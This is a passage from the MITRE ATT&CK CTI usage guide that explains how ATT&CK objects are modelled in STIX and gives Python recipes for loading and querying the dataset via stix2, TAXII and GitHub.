ATT&CK IDs). The first external reference also includes a `url` field linking to the page describing that object on the [ATT&CK Website](https://attack.mitre.org/). + +#### STIX IDs + +In addition to ATT&CK IDs, all objects in ATT&CK (including relationships) have STIX IDs in the `id` field of the object. Unlike ATT&CK IDs, STIX IDs are guaranteed to be unique. STIX IDs are therefore the best way to retrieve and refer to objects programmatically. + +#### Other IDs + +Several other IDs can be found in the external references of an object: + +1. NIST Mobile Threat Catalogue IDs can be found for some techniques in the Mobile domain where the external reference `source_name` is `"NIST Mobile Threat Catalogue"` +2. CAPEC IDs can be found for some techniques in the Enterprise domain where the external reference `source_name` is `"capec"` + +### ATT&CK Types + +#### Matrices + +The overall layout of the ATT&CK Matrices is stored in `x-mitre-matrix` objects. As a custom STIX type they follow only the generic [STIX Domain Object pattern](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230920). + +Matrices extend the generic SDO format with the following field: + +| Field | Type | Description | +|:------|:-----|-------------| +| `tactic_refs` | string[] | The `tactic_refs` array of the matrix contains an ordered list of `x-mitre-tactic` STIX IDs corresponding to the tactics of the matrix. The order of `tactic_refs` determines the order the tactics should appear within the matrix. | + +##### Mapping matrices, tactics and techniques + +Techniques map into tactics by use of their `kill_chain_phases` property. Where the `kill_chain_name` is `mitre-attack`, `mitre-mobile-attack`, or `mitre-ics-attack` (for enterprise, mobile, and ics domains respectively), the `phase_name` corresponds to the `x_mitre_shortname` property of an `x-mitre-tactic` object. Matrices define their tactics in order using the `tactic_refs` embedded relationships. + +matrix, tactic and technique data model + +#### Tactics + +A Tactic in ATT&CK is defined by an `x-mitre-tactic` object. As a custom STIX type they follow only the generic [STIX Domain Object pattern](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230920). + +Tactics extend the generic SDO format with the following field: + +| Field | Type | Description | +|:------|:-----|-------------| +| `x_mitre_shortname` | string | The `x_mitre_shortname` of the tactic is used for mapping techniques into the tactic. It corresponds to `kill_chain_phases.phase_name` of the techniques in the tactic. See [mapping matrices, tactics and techniques](#mapping-matrices-tactics-and-techniques) for more information. | + +#### Techniques + +A Technique in ATT&CK is defined as an [attack-pattern](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230921) object. + +Techniques depart from the attack-pattern format with the following fields. Domain and tactic specific fields are marked in the "applies to" column: + +| Field | Type | Applies to | Description | +|:------|:-----|:--------|:------------| +| `x_mitre_detection` | string | All techniques | Strategies for identifying if a technique has been used by an adversary. | +| `x_mitre_platforms` | string[] | All techniques | List of platforms that apply to the technique. | +| `x_mitre_data_sources` | string[] | Enterprise* & ICS domains | Sources of information that may be used to identify the action or result of the action being performed. | +| `x_mitre_is_subtechnique` | boolean | Enterprise domain | If true, this `attack-pattern` is a sub-technique. See [sub-techniques](#sub-techniques). | +| `x_mitre_system_requirements` | string[] | Enterprise domain | Additional information on requirements the adversary needs to meet or about the state of the system (software, patch level, etc.) that may be required for the technique to work. | +| `x_mitre_tactic_type` | string[] | Mobile domain | "Post-Adversary Device Access", "Pre-Adversary Device Access", or "Without Adversary Device Access". | +| `x_mitre_permissions_required` | string[] | Enterprise domain in the _Privilege Escalation_ tactic | The lowest level of permissions the adversary is required to be operating within to perform the technique on a system. | +| `x_mitre_effective_permissions` | string[] | Enterprise domain in the _Privilege Escalation_ tactic | The level of permissions the adversary will attain by performing the technique. | +| `x_mitre_defense_bypassed` | string[] | Enterprise domain in the _Defense Evasion_ tactic | List of defensive tools, methodologies, or processes the technique can bypass. | +| `x_mitre_remote_support` | boolean | Enterprise domain in the _Execution_ tactic | If true, the technique can be used to execute something on a remote system. | +| `x_mitre_impact_type` | string[] | Enterprise domain in the _Impact_ tactic | Denotes if the technique can be used for integrity or availability attacks. | + +\* In the Enterprise domain data sources are represented via [x-mitre-data-source](#data-sources) and [x-mitre-data-component](#data-components) objects, and their relationship with techniques through relationships of type `detects`. The `x_mitre_data_sources` field will still be maintained on enterprise techniques for backwards-compatibility purposes but we advise against its use as it does not include the full context of the data model. + +See [mapping matrices, tactics and techniques](#mapping-matrices-tactics-and-techniques) for more information about how techniques map into tactics and matrices. + +##### Sub-Techniques + +A sub-technique in ATT&CK is represented as an `attack-pattern` and follows the same format as [techniques](#techniques). They differ in that they have a boolean field (`x_mitre_is_subtechnique`) marking them as sub-techniques, and a relationship of the type `subtechnique-of` where the `source_ref` is the sub-technique and the `target_ref` is the parent technique. A sub-technique can only have 1 parent technique, but techniques can have multiple sub-techniques. + +Additionally: + +- Sub-technique ATT&CK IDs are a suffix of their parent IDs. For a given sub-technique ID `Txxxx.yyy`, `Txxxx` is the parent technique ID and `yyy` is the sub-technique ID. Sub-techniques have unique STIX IDs. +- Sub-techniques have the same tactics as their parent technique. +- Sub-techniques have a subset of their parent technique's platforms. + +Sub-techniques only exist in the enterprise domain. + +#### Procedures + +ATT&CK does not represent procedures under their own STIX type. Instead, procedures are represented as relationships of type `uses` where the `target_ref` is a technique. This means that procedures can stem from usage by both groups (`intrusion-set`s) and software (`malware` or `tool`s). The content of the procedure is described in the relationship description. + +#### Mitigations + +A Mitigation in ATT&CK is defined as a [course-of-action](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230929) object. ATT&CK Mitigations do not depart from the STIX `course-of-action` spec. + +##### Collisions with technique ATT&CK IDs + +In ATT&CK versions prior to v5 (released in July of 2019), mitigations had 1:1 relationships with techniques and shared their technique's ID. These old 1:1 mitigations are deprecated in subsequent ATT&CK releases, and can be filtered out in queries — see [Removing revoked and deprecated objects](#Removing-revoked-and-deprecated-objects). + +#### Groups + +A Group in ATT&CK is defined as an [intrusion-set](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230941) object. ATT&CK Groups do not depart from the STIX `intrusion-set` format. + +#### Software + +Software in ATT&CK is the union of two distinct STIX types: [malware](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230945) and [tool](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230961). + +Both `malware` and `tool` type software depart from the STIX format with the following fields: + +| Field | Type | Description | +|:------|:-----|-------------| +| `x_mitre_platforms` | string[] | List of platforms that apply to the software. | +| `x_mitre_aliases` | string[] | List of aliases for the given software. | + +#### Data Sources and Data Components + +Data Sources and Data Components represent data which can be used to detect techniques. Data components are nested within a data source but have their own STIX object. + +- A Data Component can only have one parent Data Source. +- A Data Source can have any number of Data Components. +- Data Components can map to any number of techniques. + +The general structure of data sources and data components is as follows: + + +```sh + "detects" x_mitre_data_source_ref + relationship embedded relationship + │ │ +┌───────────┐ ▼ ┌────────────────┐ │ ┌───────────┐ +│Technique 1│◄────┤ │ │ │ │ +└───────────┘ │ │ ▼ │ │ + │Data Component 1├────►│ │ +┌───────────┐ │ │ │ │ +│Technique 2│◄────┤ │ │Data Source│ +└───────────┘ └────────────────┘ │ │ + │ │ +┌───────────┐ ┌────────────────┐ │ │ +│Technique 3│◄────┤Data Component 2├────►│ │ +└───────────┘ └────────────────┘ └───────────┘ +``` + +Prior to ATT&CK v10 data sources were stored in a `x_mitre_data_sources` field on techniques. This representation is still available for backwards-compatibility purposes, and does properly reflect the current set of data sources. However, because information is lost in that representation we advise against using it except in legacy applications. The ATT&CK for ICS domain still uses only the `x_mitre_data_sources` field. + +##### Data Sources + +A Data Source in ATT&CK is defined by an `x-mitre-data-source` object. As a custom STIX type they follow only the generic [STIX Domain Object pattern](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230920). + +Data Sources extend the generic SDO format with the following fields: + +| Field | Type | Description | +|:------|:-----|-------------| +| `x_mitre_platforms` | string[] | List of platforms that apply to the data source. | +| `x_mitre_collection_layers` | string[] | List of places the data can be collected from. | + +##### Data Components + +A Data Component in ATT&CK is represented as an `x-mitre-data-component` object. As a custom STIX type they follow only the generic [STIX Domain Object pattern](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230920). + +Data Components extend the generic SDO format with the following field: + +| Field | Type | Description | +|:------|:-----|-------------| +| `x_mitre_data_source_ref` | embedded relationship (string) | STIX ID of the data source this component is a part of. | + +#### Campaigns + +A Campaign in ATT&CK is defined as a [campaign](http://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230925) object. + +Campaigns extend the generic SDO format with the following fields: + +| Field | Type | Description | +|:------|:-----|-------------| +| `x_mitre_first_seen_citation` | string | One to many citations for when the Campaign was first reported in the form “(Citation: \)” where \ can be found as one of the source_name of one of the external_references. | +| `x_mitre_last_seen_citation` | string | One to many citations for when the Campaign was last reported in the form “(Citation: \)” where \ can be found as one of the source_name of one of the external_references. + +#### Relationships + +Objects in ATT&CK are related to each other via STIX [relationship](https://docs.oasis-open.org/cti/stix/v2.0/csprd01/part2-stix-objects/stix-v2.0-csprd01-part2-stix-objects.html#_Toc476230970) objects. These relationships convey concepts like groups using techniques (also called "procedure examples" on the technique pages), the hierarchy of techniques and sub-techniques, and so on. + +relationships data model + +Unlike other objects in the dataset, relationships cannot be revoked or deprecated. Relationships are considered deprecated/revoked if one of the objects it is attached to is revoked or deprecated. See [Working with deprecated and revoked objects](#Working-with-deprecated-and-revoked-objects) for more information on revoked objects. + +Relationships oftentimes have descriptions which contextualize the relationship between the objects. + +| Source Type | Relationship Type | Target Type | Custom Type? | About | +|:------------|:------------------|:------------|:----|:------| +| `intrusion-set` | `uses` | `malware` or `tool` | No | Group using a software. | +| `intrusion-set` | `uses` | `attack-pattern` | No | Group using a technique, which is also considered a procedure example. | +| `malware` or `tool` | `uses` | `attack-pattern` | No | Software using a technique, which is also considered a procedure example. | +| `campaign` | `uses` | `malware` or `tool` | No | Campaign using a software. | +| `campaign` | `uses` | `attack-pattern` | No | Campaign using a technique, which is also considered a procedure example. | +| `campaign` | `attributed-to` | `intrusion-set` | No | Campaign attributed to a group. | +| `course-of-action` | `mitigates` | `attack-pattern` | No | Mitigation mitigating a technique. | +| `attack-pattern` | `subtechnique-of` | `attack-pattern` | Yes | Sub-technique of a technique, where the `source_ref` is the sub-technique and the `target_ref` is the parent technique. | +| `x-mitre-data-component` | `detects` | `attack-pattern` | Yes | Data component detecting a technique. | +| any type | `revoked-by` | any type | Yes | The target object is a replacement for the source object. Only occurs where the objects are of the same type, and the source object will have the property `revoked = true`. See [Working with deprecated and revoked objects](#Working-with-deprecated-and-revoked-objects) for more information on revoked objects. | + +Note that because groups use software and software uses techniques, groups can be considered indirect users of techniques used by their software. See [Getting techniques used by a group's software](#Getting-techniques-used-by-a-groups-software). + +## Accessing ATT&CK data in python + +There are several ways to acquire the ATT&CK data in Python. All of them will provide an object +implementing the DataStore API and can be used interchangeably with the recipes provided in the [Python recipes](#Python-Recipes) section. + +This section utilizes the [stix2 python library](https://github.com/oasis-open/cti-python-stix2). Please refer to the [STIX2 Python API Documentation](https://stix2.readthedocs.io/en/latest/) for more information on how to work with STIX programmatically. + +### Requirements and imports + +Before installing requirements, we recommend setting up a virtual environment: + +1. Create virtual environment: + - macOS and Linux: `python3 -m venv env` + - Windows: `py -m venv env` +2. Activate the virtual environment: + - macOS and Linux: `source env/bin/activate` + - Windows: `env/Scripts/activate.bat` + +#### stix2 + +[stix2 can be installed by following the instructions on their repository](https://github.com/oasis-open/cti-python-stix2#installation). Imports for the recipes in this repository can be done from the base package, for example: + +```python +from stix2 import Filter +``` + +However, if you are aiming to extend the ATT&CK dataset with new objects or implement complex workflows, you may need to use the `v20` specifier for some imports. This ensures that the objects use the STIX 2.0 API instead of the STIX 2.1 API. For example: + +```python +from stix2.v20 import AttackPattern +``` + +You can see a full list of the classes which have versioned imports [here](https://stix2.readthedocs.io/en/latest/api/stix2.v20.html). + +#### taxii2client + +[taxii2-client can be installed by following the instructions on their repository](https://github.com/oasis-open/cti-taxii-client#installation). The ATT&CK TAXII server implements the 2.0 version of the TAXII specification, but the default import of `taxii2client` (version 2.0.0 and above) uses the 2.1 version of the TAXII specification, which can lead to 406 responses when connecting to our TAXII server if not accounted for. + +If the TAXII Client is getting a 406 Response, make sure you are running the latest version (`pip install --upgrade stix2` or `pip install --upgrade taxii2-client`). In addition, make sure you are running the 2.0 version of the client (using the `v20` import) as shown below in order to communicate with the ATT&CK TAXII 2.0 Server. + +```python +from taxii2client.v20 import Collection +``` + +### Access local content + +Many users may opt to access the ATT&CK content via a local copy of the STIX data on this repo. This can be advantageous for several reasons: + +- Doesn't require internet access after the initial download +- User can modify the ATT&CK content if desired +- Downloaded copy is static, so updates to the ATT&CK catalog won't cause bugs in automated workflows. User can still manually update by cloning a fresh version of the data + +#### Access via FileSystemSource + +Each domain in this repo is formatted according to the [STIX2 FileSystem spec](https://stix2.readthedocs.io/en/latest/guide/filesystem.html). +Therefore you can use a `FileSystemSource` to load a domain, for example to load the enterprise-attack domain: + +```python +from stix2 import FileSystemSource + +src = FileSystemSource('./cti/enterprise-attack') +``` + +#### Access via bundle + +If you instead prefer to download just the domain bundle, e.g [enterprise-attack.json](/enterprise-attack/enterprise-attack.json), you can still load this using a MemoryStore: + +```python +from stix2 import MemoryStore + +src = MemoryStore() +src.load_from_file("enterprise-attack.json") +``` + +### Access live content + +Some users may instead prefer to access "live" ATT&CK content over the internet. This is advantageous for several reasons: + +- Always stays up to date with the evolving ATT&CK catalog +- Doesn't require an initial download of the ATT&CK content, generally requires less setup + +#### Access from the ATT&CK TAXII server + +Users can access the ATT&CK data from the official ATT&CK TAXII server. In TAXII, the ATT&CK domains are represented as collections with static IDs: + +| domain | collection ID | +|:-------|:--------------| +| `enterprise-attack` | `95ecc380-afe9-11e4-9b6c-751b66dd541e` | +| `mobile-attack` | `2f669986-b40b-4423-b720-4396ca6a462b` | +| `ics-attack` | `02c3ef24-9cd4-48f3-a99f-b74ce24f1d34` | + +You can also get a list of available collection from the server directly: + +```python +from taxii2client.v20 import Server # only specify v20 if your installed version is >= 2.0.0 + +server = Server("https://cti-taxii.mitre.org/taxii/") +api_root = server.api_roots[0] +# Print name and ID of all ATT&CK domains available as collections +for collection in api_root.collections: + print(collection.title.ljust(20) + collection.id) +``` + +The following recipe demonstrates how to access the enterprise-attack data from the TAXII server. + +```python +from stix2 import TAXIICollectionSource +from taxii2client.v20 import Collection # only specify v20 if your installed version is >= 2.0.0 + +collections = { + "enterprise_attack": "95ecc380-afe9-11e4-9b6c-751b66dd541e", + "mobile_attack": "2f669986-b40b-4423-b720-4396ca6a462b", + "ics-attack": "02c3ef24-9cd4-48f3-a99f-b74ce24f1d34" +} + +collection = Collection(f"https://cti-taxii.mitre.org/stix/collections/{collections['enterprise_attack']}/") +src = TAXIICollectionSource(collection) +``` + +For more about TAXII, please see oasis-open's [Introduction to TAXII](https://oasis-open.github.io/cti-documentation/taxii/intro). + +#### Access from Github via requests + +Users can alternatively access the data from MITRE/CTI using HTTP requests, and load the resulting content into a MemoryStore. +While typically the TAXII method is more desirable for "live" access, this method can be useful if you want to +access data on a branch of the MITRE/CTI repo (the TAXII server only holds the master branch) or in the case of a TAXII server outage. + +```python +import requests +from stix2 import MemoryStore + +def get_data_from_branch(domain, branch="master"): + """get the ATT&CK STIX data from MITRE/CTI. Domain should be 'enterprise-attack', 'mobile-attack' or 'ics-attack'. Branch should typically be master.""" + stix_json = requests.get(f"https://raw.githubusercontent.com/mitre/cti/{branch}/{domain}/{domain}.json").json() + return MemoryStore(stix_data=stix_json["objects"]) + +src = get_data_from_branch("enterprise-attack") +``` + +### Access a specific version of ATT&CK + +ATT&CK versions are tracked on the MITRE/CTI repo using [tags](https://github.com/mitre/cti/tags). Tags prefixed with `ATT&CK-v` correspond to ATT&CK versions and tags prefixed with `CAPEC-v` correspond to CAPEC versions. You can find more information about ATT&CK versions on the [versions of ATT&CK page](https://attack.mitre.org/resources/versions/) on the ATT&CK website. + +In addition to checking out the repo under the tag for a given version or downloading the STIX from github using your browser, you can also use a variation on the [requests method](#access-from-github-via-requests) to access a particular version of ATT&CK: + +```python +import requests +from stix2 import MemoryStore + +def get_data_from_version(domain, version): + """get the ATT&CK STIX data for the given version from MITRE/CTI. Domain should be 'enterprise-attack', 'mobile-attack' or 'ics-attack'.""" + stix_json = requests.get(f"https://raw.githubusercontent.com/mitre/cti/ATT%26CK-v{version}/{domain}/{domain}.json").json() + return MemoryStore(stix_data=stix_json["objects"]) + +src = get_data_from_version("enterprise-attack", "5.2") +``` + +You can get a list of ATT&CK versions programmatically using the github API: + +```python +import requests +import re + +refToTag = re.compile(r"ATT&CK-v(.*)") +tags = requests.get("https://api.github.com/repos/mitre/cti/git/refs/tags").json() +versions = list(map(lambda tag: refToTag.search(tag["ref"]).groups()[0] , filter(lambda tag: "ATT&CK-v" in tag["ref"], tags))) +# versions = ["1.0", "2.0", ...] +``` + +### Access multiple domains simultaneously + +Because ATT&CK is stored in multiple domains (as of this writing, enterprise-attack, mobile-attack and ics-attack), the above methodologies will only allow you to work +with a single domain at a time. While oftentimes the hard separation of domains is advantageous, occasionally it is useful to combine +domains into a single DataStore. Use any of the methods above to acquire the individual datastores, and then use the following approach to combine them into +a single CompositeDataSource: + +```python +from stix2 import CompositeDataSource + +src = CompositeDataSource() +src.add_data_sources([enterprise_attack_src, mobile_attack_src, ics_attack_src]) +``` + +You can then use this CompositeDataSource just as you would the DataSource for an individual domain. + +## Python recipes + +Below are example python recipes which can be used to work with ATT&CK data. They assume the existence of an object implementing the DataStore API. Any of the methods outlined in the [Accessing ATT&CK data in python](#accessing-ATTCK-Data-in-Python) section should provide an object implementing this API. + +This section utilizes the [stix2 python library](https://github.com/oasis-open/cti-python-stix2). Please refer to the [STIX2 Python API Documentation](https://stix2.readthedocs.io/en/latest/) for more information on how to work with STIX programmatically. See also the section on [Requirements and imports](#requirements-and-imports). + +### Getting an object + +The recipes in this section address how to query the dataset for a single object. + +#### By STIX ID + +The following recipe can be used to retrieve an object according to its STIX ID. This is typically the preferred way to retrieve objects when working with ATT&CK data because STIX IDs are guaranteed to be unique. + +```python +g0075 = src.get("intrusion-set--f40eb8ce-2a74-4e56-89a1-227021410142") +``` + +#### By ATT&CK ID + +The following recipe can be used to retrieve an object according to its ATT&CK ID: + +```python +from stix2 import Filter + +g0075 = src.query([ Filter("external_references.external_id", "=", "G0075") ])[0] +``` + +Note: in prior versions of ATT&CK, mitigations had 1:1 relationships with techniques and shared their technique's ID. Therefore the above method does not work properly for techniques because technique ATTT&CK IDs are not truly unique. By specifying the STIX type you're looking for as `attack-pattern` you can avoid this issue. + +```python +from stix2 import Filter + +t1134 = src.query([ + Filter("external_references.external_id", "=", "T1134"), + Filter("type", "=", "attack-pattern") +])[0] +``` + +The old 1:1 mitigations causing this issue are deprecated, so you can also filter them out that way — see [Removing revoked and deprecated objects](#Removing-revoked-and-deprecated-objects). + +#### By name + +The following recipe retrieves an object according to its name: + +```python +from stix2 import Filter + +def get_technique_by_name(thesrc, name): + filt = [ + Filter('type', '=', 'attack-pattern'), + Filter('name', '=', name) + ] + return thesrc.query(filt) +# get the technique titled "System Information Discovery" +get_technique_by_name(src, 'System Information Discovery') +``` + +#### By alias + +The following methodology can be used to find the group corresponding to a given alias: + +```python +from stix2 import Filter + +def get_group_by_alias(thesrc, alias): + return thesrc.query([ + Filter('type', '=', 'intrusion-set'), + Filter('aliases', '=', alias) + ])[0] + +get_group_by_alias(src, 'Cozy Bear') +``` + +### Getting multiple objects + +The recipes in this section address how to query the dataset for multiple objects. + +⚠ When working with queries to return objects based on a set of characteristics, it is likely that you'll end up with a few objects which are no longer maintained by ATT&CK. These are objects marked as deprecated or revoked. We keep these outdated objects around so that workflows depending on them don't break, but we recommend you avoid using them when possible. Please see the section [Working with deprecated and revoked objects](#Working-with-deprecated-and-revoked-objects) for more information. + +#### Objects by type + +See [The ATT&CK data model](#The-ATTCK-Data-Model) for mappings of ATT&CK type to STIX type. + +```python +from stix2 import Filter + +# use the appropriate STIX type in the query according to the desired ATT&CK type +groups = src.query([ Filter("type", "=", "intrusion-set") ]) +``` + +##### Getting techniques or sub-techniques + +ATT&CK Techniques and sub-techniques are both represented as `attack-pattern` objects. Therefore further parsing is necessary to get specifically techniques or sub-techniques. + +```python +from stix2 import Filter + +def get_techniques_or_subtechniques(thesrc, include="both"): + """Filter Techniques or Sub-Techniques from ATT&CK Enterprise Domain. + include argument has three options: "techniques", "subtechniques", or "both" + depending on the intended behavior.""" + if include == "techniques": + query_results = thesrc.query([ + Filter('type', '=', 'attack-pattern'), + Filter('x_mitre_is_subtechnique', '=', False) + ]) + elif include == "subtechniques": + query_results = thesrc.query([ + Filter('type', '=', 'attack-pattern'), + Filter('x_mitre_is_subtechnique', '=', True) + ]) + elif include == "both": + query_results = thesrc.query([ + Filter('type', '=', 'attack-pattern') + ]) + else: + raise RuntimeError("Unknown option %s!" % include) + + return query_results + + +subtechniques = get_techniques_or_subtechniques(src, "subtechniques") +subtechniques = remove_revoked_deprecated(subtechniques) # see https://github.com/mitre/cti/blob/master/USAGE.md#removing-revoked-and-deprecated-objects +``` + +##### Getting software + +Because software are the union of two STIX types (`tool` and `malware`), the process for accessing software is slightly more complicated. + +```python +from itertools import chain +from stix2 import Filter + +def get_software(thesrc): + return list(chain.from_iterable( + thesrc.query(f) for f in [ + Filter("type", "=", "tool"), + Filter("type", "=", "malware") + ] + )) + +get_software(src) +``` + +#### Objects by content + +Sometimes it may be useful to query objects by the content of their description: + +```python +from stix2 import Filter + +def get_techniques_by_content(thesrc, content): + techniques = src.query([ Filter('type', '=', 'attack-pattern') ]) + return list(filter(lambda t: content.lower() in t.description.lower(), techniques)) + +# Get all techniques where the string LSASS appears in the description +get_techniques_by_content(src, 'LSASS') +``` + +#### Techniques by platform + +Techniques are associated with one or more platforms. You can query the techniques +under a specific platform with the following code: + +```python +from stix2 import Filter + +def get_techniques_by_platform(thesrc, platform): + return thesrc.query([ + Filter('type', '=', 'attack-pattern'), + Filter('x_mitre_platforms', '=', platform) + ]) + +# get techniques in the windows platform +get_techniques_by_platform(src, 'Windows') +``` + +#### Techniques by tactic + +Techniques are related to tactics by their kill_chain_phases property. +The `phase_name` of each kill chain phase corresponds to the `x_mitre_shortname` of a tactic. + +```python +from stix2 import Filter + +def get_tactic_techniques(thesrc, tactic): + # double checking the kill chain is MITRE ATT&CK + # note: kill_chain_name is different for other domains: + # - enterprise: "mitre-attack" + # - mobile: "mitre-mobile-attack" + # - ics: "mitre-ics-attack" + return thesrc.query([ + Filter('type', '=', 'attack-pattern'), + Filter('kill_chain_phases.phase_name', '=', tactic), + Filter('kill_chain_phases.kill_chain_name', '=', 'mitre-attack'), + ]) + + +# use the x_mitre_shortname as argument +get_tactic_techniques(src, 'defense-evasion') +``` + +#### Tactics by matrix + +The tactics are individual objects (`x-mitre-tactic`), and their order in a matrix (`x-mitre-matrix`) is +found within the `tactic_refs` property in a matrix. The order of the tactics in that list matches +the ordering of the tactics in that matrix. The following recipe returns a structured list of tactics within each matrix of the input DataStore. + +```python +from stix2 import Filter + +def getTacticsByMatrix(thesrc): + tactics = {} + matrix = thesrc.query([ + Filter('type', '=', 'x-mitre-matrix'), + ]) + + for i in range(len(matrix)): + tactics[matrix[i]['name']] = [] + for tactic_id in matrix[i]['tactic_refs']: + tactics[matrix[i]['name']].append(thesrc.get(tactic_id)) + + return tactics + +# get tactic layout +getTacticsByMatrix(src) +``` + +#### Objects created or modified since a given date + +Sometimes you may want to get a list of objects which have been created or modified after a certain time. + +```python +from stix2 import Filter + +def get_created_after(thesrc, timestamp): + filt = [ + Filter('created', '>', timestamp) + ] + return thesrc.query(filt) + +get_created_after(src, "2018-10-01T00:14:20.652Z") + + +def get_modified_after(thesrc, timestamp): + filt = [ + Filter('modified', '>', timestamp) + ] + return thesrc.query(filt) + +get_modified_after(src, "2018-10-01T00:14:20.652Z") +``` + +We don't recommend you use this method to detect a change to the contents of the knowledge base. For detecting an update to the overall knowledge base we recommend using requests to [check the list of released versions of ATT&CK](https://github.com/mitre/cti/blob/master/USAGE.md#access-a-specific-version-of-attck). + +### Getting related objects + +A large part of working with ATT&CK revolves around parsing relationships between objects. It is useful +to track not only the related object but the relationship itself because a description is often +present to contextualize the nature of the relationship. The following recipes demonstrate +some common uses of relationships. + +#### Relationships microlibrary + +NOTE: The following code is intended to be used with the ATT&CK v12 release which includes Campaign Objects. +The examples are backwards-compatible for previous versions af ATT&CK that omit those objects. + +This microlibrary can be used to build a lookup table of stixID to related objects and relationships. +The argument to each accessor function is a STIX2 MemoryStore to build the relationship mappings from. + +```python +from pprint import pprint +from stix2 import MemoryStore, Filter + +# See section below on "Removing revoked and deprecated objects" +def remove_revoked_deprecated(stix_objects): + """Remove any revoked or deprecated objects from queries made to the data source""" + # Note we use .get() because the property may not be present in the JSON data. The default is False + # if the property is not set. + return list( + filter( + lambda x: x.get("x_mitre_deprecated", False) is False and x.get("revoked", False) is False, + stix_objects + ) + ) + +def get_related(thesrc, src_type, rel_type, target_type, reverse=False): + """build relationship mappings + params: + thesrc: MemoryStore to build relationship lookups for + src_type: source type for the relationships, e.g "attack-pattern" + rel_type: relationship type for the relationships, e.g "uses" + target_type: target type for the relationship, e.g "intrusion-set" + reverse: build reverse mapping of target to source + """ + + relationships = thesrc.query([ + Filter('type', '=', 'relationship'), + Filter('relationship_type', '=', rel_type), + Filter('revoked', '=', False), + ]) + + # See section below on "Removing revoked and deprecated objects" + relationships = remove_revoked_deprecated(relationships) + + # stix_id => [ { relationship, related_object_id } for each related object ] + id_to_related = {} + + # build the dict + for relationship in relationships: + if src_type in relationship.source_ref and target_type in relationship.target_ref: + if (relationship.source_ref in id_to_related and not reverse) or (relationship.target_ref in id_to_related and reverse): + # append to existing entry + if not reverse: + id_to_related[relationship.source_ref].append({ + "relationship": relationship, + "id": relationship.target_ref + }) + else: + id_to_related[relationship.target_ref].append({ + "relationship": relationship, + "id": relationship.source_ref + }) + else: + # create a new entry + if not reverse: + id_to_related[relationship.source_ref] = [{ + "relationship": relationship, + "id": relationship.target_ref + }] + else: + id_to_related[relationship.target_ref] = [{ + "relationship": relationship, + "id": relationship.source_ref + }] + # all objects of relevant type + if not reverse: + targets = thesrc.query([ + Filter('type', '=', target_type), + Filter('revoked', '=', False) + ]) + else: + targets = thesrc.query([ + Filter('type', '=', src_type), + Filter('revoked', '=', False) + ]) + + # build lookup of stixID to stix object + id_to_target = {} + for target in targets: + id_to_target[target.id] = target + + # build final output mappings + output = {} + for stix_id in id_to_related: + value = [] + for related in id_to_related[stix_id]: + if not related["id"] in id_to_target: + continue # targeting a revoked object + value.append({ + "object": id_to_target[related["id"]], + "relationship": related["relationship"] + }) + output[stix_id] = value + return output + +# software:group +def software_used_by_groups(thesrc): + """returns group_id => {software, relationship} for each software used by the group and each software used by campaigns attributed to the group.""" + # get all software used by groups + tools_used_by_group = get_related(thesrc, "intrusion-set", "uses", "tool") + malware_used_by_group = get_related(thesrc, "intrusion-set", "uses", "malware") + software_used_by_group = {**tools_used_by_group, **malware_used_by_group} # group_id -> [{software, relationship}] + + # get groups attributing to campaigns and all software used by campaigns + software_used_by_campaign = get_related(thesrc, "campaign", "uses", "tool") + malware_used_by_campaign = get_related(thesrc, "campaign", "uses", "malware") + for id in malware_used_by_campaign: + if id in software_used_by_campaign: + software_used_by_campaign[id].extend(malware_used_by_campaign[id]) + else: + software_used_by_campaign[id] = malware_used_by_campaign[id] + campaigns_attributed_to_group = { + "campaigns": get_related(thesrc, "campaign", "attributed-to", "intrusion-set", reverse=True), # group_id => {campaign, relationship} + "software": software_used_by_campaign # campaign_id => {software, relationship} + } + + for group_id in campaigns_attributed_to_group["campaigns"]: + software_used_by_campaigns = [] + # check if attributed campaign is using software + for campaign in campaigns_attributed_to_group["campaigns"][group_id]: + campaign_id = campaign["object"]["id"] + if campaign_id in campaigns_attributed_to_group["software"]: + software_used_by_campaigns.extend(campaigns_attributed_to_group["software"][campaign_id]) + + # update software used by group to include software used by a groups attributed campaign + if group_id in software_used_by_group: + software_used_by_group[group_id].extend(software_used_by_campaigns) + else: + software_used_by_group[group_id] = software_used_by_campaigns + return software_used_by_group + +def groups_using_software(thesrc): + """returns software_id => {group, relationship} for each group using the software and each software used by attributed campaigns.""" + # get all groups using software + groups_using_tool = get_related(thesrc, "intrusion-set", "uses", "tool", reverse=True) + groups_using_malware = get_related(thesrc, "intrusion-set", "uses", "malware", reverse=True) + groups_using_software = {**groups_using_tool, **groups_using_malware} # software_id => {group, relationship} + + # get campaigns attributed to groups and all campaigns using software + campaigns_using_software = get_related(thesrc, "campaign", "uses", "tool", reverse=True) + campaigns_using_malware = get_related(thesrc, "campaign", "uses", "malware", reverse=True) + for id in campaigns_using_malware: + if id in campaigns_using_software: + campaigns_using_software[id].extend(campaigns_using_malware[id]) + else: + campaigns_using_software[id] = campaigns_using_malware[id] + groups_attributing_to_campaigns = { + "campaigns": campaigns_using_software,# software_id => {campaign, relationship} + "groups": get_related(thesrc, "campaign", "attributed-to", "intrusion-set") # campaign_id => {group, relationship} + } + + for software_id in groups_attributing_to_campaigns["campaigns"]: + groups_attributed_to_campaigns = [] + # check if campaign is attributed to group + for campaign in groups_attributing_to_campaigns["campaigns"][software_id]: + campaign_id = campaign["object"]["id"] + if campaign_id in 